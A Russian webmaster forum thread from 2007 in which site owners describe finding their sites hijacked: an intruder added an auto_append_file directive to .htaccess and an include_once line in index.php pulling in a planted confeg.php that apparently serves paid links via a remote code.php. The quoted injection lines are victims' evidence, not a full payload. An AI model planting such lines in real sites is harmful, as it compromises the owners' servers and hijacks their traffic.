16.11.2007, 02:26 | #1 |
Новичок
Регистрация: 16.11.2007
Сообщений: 4
Вес репутации: 0
|
Как наказать мошенника
Мошенник получил доступ к моему сайту, и зарабатывает на моем сайте деньги, пользуясь Вашей системой.
в .htaccess дописал php_value auto_append_file "templates/order/confeg.php" В коде нашел прикрепляемого файла нашел PHP код:
Индендификатор пользователя: 3649bf00e385a718f7e5a8a09ba0a523 В инете ничего похожего не нарыл, видимо я в числе первых жертв подобного мошенничества. Если бы мошенник оказался хитрее и хотя бы спрятал ссылки стилями, я бы нескоро его вычислил, так как редко заглядываю в .htaccess . |
16.11.2007, 06:19 | #3 |
Модератор
Регистрация: 07.06.2007
Сообщений: 3,491
Вес репутации: 314
|
информация скинута куда надо.
__________________
Секреты успешной работы вебмастеров в Sape - Бестселлер года! Расширяем возможности SAPE: дополнение к Firefox - без него, как без рук. |
16.11.2007, 09:24 | #4 |
Эксперт
|
скорее всего у вас вирус и сохраненные пароли в файлменеджере
__________________
Аттестат продавца. |
16.11.2007, 13:06 | #6 |
Новичок
Регистрация: 16.11.2007
Сообщений: 4
Вес репутации: 0
|
Аккуратненько так, с комментариями.
PHP код:
|
16.11.2007, 13:25 | #8 |
Новичок
Регистрация: 16.11.2007
Сообщений: 4
Вес репутации: 0
|
Massacre, у аккаунта, на котором лежит этот сайт, есть еще хозяин. Лучше чтобы дорвеи лежали на разных серверах, а это накладно, вот я и кооперируюсь с разными людьми, в которых не до конца уверен. Вариант что мой человек подложил вирус маловероятен, но может быть затроянили его комп, или он пользуется левыми скриптами...
В последнее время просто эпидемия какая-то пошла, я не знаю ни одного вебмастера, чей бы сайт хоть раз бы не заразили, при этом не важно какая у него защита и где он хостится. Неплохо бы было узнать к-н данные этого человека, хотя бы ящик почтовый.. мало ли кто из знакомых. |
25.11.2007, 22:18 | #9 |
Новичок
Регистрация: 25.11.2007
Сообщений: 1
Вес репутации: 0
|
Сегодня то же самое
со мной сегодня то же самое. К сожалению, мало понимаю в этой теме, в том числе в php. Два вопроса:
1)я нашел два файла, confeg.php и измененный index. Что еще нужно проверить, чтобы удостовериться, что сайт не заражен? 2)confeg.php выглядит так же как у вас, кроме $path = '/code.php?user=8dd98c496a2b0c1b50edecb1d3deffb4&hos t=' . $this->_host; может ли это помочь вычислить этого человека? |
25.11.2007, 23:56 | #10 |
Новичок
Регистрация: 04.05.2007
Сообщений: 83
Вес репутации: 0
|
И у меня сегодня таже проблема. Обнаружил когда зашел на свой сайт. Страницы выдавали Fatal error в файле confeg.php который точно не я создавал. В index.php дописали строку
<!-- ~ --><?php include_once($_SERVER['DOCUMENT_ROOT'].'/confeg.php');?><!-- ~ --> А на другом сайте вообще убили весь index.php, все в нем стерли, одна лишь строчка была <!-- ~ --><?php include_once($_SERVER['DOCUMENT_ROOT'].'/confeg.php');?><!-- ~ --> В confeg.php тоже юзер $path = '/code.php?user=8dd98c496a2b0c1b50edecb1d3deffb4&hos t=' . $this->_host; |
Опции темы | |
|
|
Похожие темы | ||||
Тема | Автор | Раздел | Ответов | Последнее сообщение |
Кидалово работодателя - наказать или не стоит? | MadGreen | Курилка | 71 | 23.05.2008 14:03 |
А как наказать того кто ворует контент? | Vass | Курилка | 22 | 10.01.2008 18:22 |
Часовой пояс GMT +3, время: 10:27.